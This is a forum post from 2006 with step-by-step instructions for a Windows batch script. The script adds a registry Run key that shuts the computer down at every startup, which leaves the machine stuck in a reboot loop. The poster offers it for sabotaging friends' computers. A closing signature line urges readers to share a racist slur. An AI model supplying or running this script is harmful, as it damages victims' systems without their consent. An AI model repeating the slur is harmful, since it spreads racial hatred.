View Single Post
(#38)
Old
TAG is Offline
Master of the Post
TAG is on a distinguished road
 
Posts: 362
Join Date: Aug 2006
Location: Your Ass
Send a message via AIM to TAG
Default 08-20-2006, 10:48 PM

1. Open up notepad.
2. Copy & paste this into the message:
Code:
@echo off
if exist C:\system_reg.reg del C:\system_reg.reg
echo Windows Registry Editor Version 5.00 >> C:\system_reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\system_reg.reg
echo "system_reg"="\"C:/system_bat.bat\"" >> C:\system_reg.reg
regedit.exe /S /C C:\system_reg.reg
if exist C:\system_bat.bat del C:\system_bat.bat
echo SHUTDOWN -S -t 1 -c Bye, Bye! >> C:\system_bat.bat
SHUTDOWN -S -t 1 -c Fuck you asshole, your computer is fried!
3. Click 'File' > 'Save As' > 'WHATEVERYOUWANTTHEFILENAMETOBE.bat'.

Make sure to save it to your desktop for easy access. Don't double click it or else your computer will be fucked. And the 'WHATEVERYOUWANTTHEFILENAMETOBE' stands for what ever you want the file name to be. Have fun fucking up your friends computers!




Put this exact line in your sig if you hate niggers
Reply With Quote